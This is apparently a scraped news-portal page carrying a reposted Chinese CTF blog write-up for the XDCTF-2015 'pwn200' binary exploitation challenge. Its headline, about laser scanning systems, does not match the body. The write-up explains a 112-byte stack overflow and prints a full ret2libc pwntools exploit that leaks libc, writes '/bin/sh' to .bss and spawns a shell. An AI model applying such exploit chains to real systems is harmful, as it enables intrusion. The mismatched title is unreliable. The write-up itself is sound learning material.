联系我们 - 广告服务 - 联系电话:
您的当前位置: > 综合 > > 正文

微头条丨成像系统设计中的激光扫描系统——多重组态

来源:CSDN 时间:2023-03-27 14:06:08

pwn200


(资料图)

—XDCTF-2015 每日一pwn,今天又做了一个pwn,那个pwn呢???攻防世界的进阶区里的一道小pwn题,虽然这个题考察的知识不多,rop链也比较好构建,但是还是让我又学到了一些东西,因为害怕忘记,写个博客记录记录。

1.获取pwn题

啪的一下就下载好了。

2.查看保护

拿到题我不做,哎,我干什么呢,我先查看保护! 裸奔题,开的东西不多,所以这里就看我们发挥了

3.ida看看

首先可以很明显的看到,给的7个变量,在栈中是连续排列的,一开始我还不知道给这里的七个数赋值到底有什么用,我们继续往下看

这里的setbuf还把我搞蒙了一下,平时不是一般setbuf都是用来平衡栈帧的,但是今天这里涉及了&buf,我还以为我多输入的数据就会存在缓冲区里面呢有其他的用处呢,结果是我想多了,但是也侧面说明了我其实基础知识不够ok。

另外就是一个write函数在这里打印出来我们赋给变量的数值那么我们可以使用gdb调试进去看一看: 发现就是一串文字,然后继续看ida: 发现另外就有一个溢出函数,因为程序没有开gs,所以确定是可以溢出的。 使用cyclic 200,查看溢出发现是112

那么下一步我们查看一下有无可以直接跳转利用的函数 发现没有跳转的system函数,也没有第一时间看见bin/sh链,那么可以确定这是十分经典的ret2libc了,构建rop链,那么我可以写出前半部分的exp代码:

from pwn import *from LibcSearcher import*context.log_level="debug"p=process("./pwn200")e=ELF("./pwn200")read_got=e.got["read"]read_plt=e.plt["read"]write_plt=e.plt["write"]bss_add=e.bss()pop_add=0x0804856cinit=0x80483d0fun=0x8048484payload="a"*112+p32(write_plt)+p32(fun)+p32(1)+p32(read_got)+p32(4)p.recvuntil("Welcome to XDCTF2015~!\n")p.sendline(payload)read_add=u32(p.recv(4))print hex(read_add)

那至于网上好多人说使用什么dynelf函数来算,我也试了,因为最近github又登陆不上去,使用这个函数是需要下载想对的库的,网上查找资料后了解到,其实libcseracher和dynekf都是通过暴露出来的地址来查找对应的libc库的,但是libcseracher明显需要写的东西很少,而且功能更强,所以我们这里直接使用libcseracher!!!

另外第一个payload这里的p32(fun)的地址也可以换成start函数的地址,至于为什么不换成main函数的,是为了保持栈帧平衡。以及这里可以考虑通过write函数去暴露write函数的真实地址也可以选择暴露read函数实地址 另外这里通过已经暴露出来的计算基址,然后获得system函数的真实地址

另外这道题给我另外的一个反思点是什么呢,就是没有bin_sh的时候可以选择通过一个输入函数往bss段里面输入"/bin/sh"这样去构造,而不是一味的去查找,反正这道题我是没有查到的,但是我看其他人写的题解上面是有查到的

我通过ropgadget没有查找到,所以我们选择:

bss_add = elf.bss()payload="a"*112+p32(read_plt)+p32(pop_add)+p32(0)+p32(bss_add)+p32(8)+p32(system_add)+p32(fun)+p32(bss_add)p.sendline(payload)p.sendline("/bin/sh")

通过写函数给bss段写入我们的命令去使用,另外值得注意的是我们read函数在写完之后如何才能跳转到我们的system函数,这之间是需要三次pop的,所以综上exp如下:

from pwn import *from LibcSearcher import*context.log_level="debug"p=process("./pwn200")e=ELF("./pwn200")read_got=e.got["read"]read_plt=e.plt["read"]write_plt=e.plt["write"]bss_add=e.bss()pop_add=0x0804856cinit=0x80483d0fun=0x8048484payload="a"*112+p32(write_plt)+p32(fun)+p32(1)+p32(read_got)+p32(4)p.recvuntil("Welcome to XDCTF2015~!\n")p.sendline(payload)read_add=u32(p.recv(4))print hex(read_add)obj = LibcSearcher("read",read_add)base=read_add-obj.dump("read")system_add=base+obj.dump("system")print "sys---"+hex(system_add)print "base---"+hex(base)pause()payload="a"*112+p32(read_plt)+p32(pop_add)+p32(0)+p32(bss_add)+p32(8)+p32(system_add)+p32(fun)+p32(bss_add)p.sendline(payload)p.sendline("/bin/sh")p.interactive()

另外小插曲是我的libcseracher好像里面自带的库很少,所以暴露出来libc库计算得到的system函数的地址都是不合适的,然后学长还在他的电脑上面试了试,发现不是思路的问题,而是库的数量不够的问题。

责任编辑:

标签:

相关推荐:

精彩放送:

新闻聚焦
Top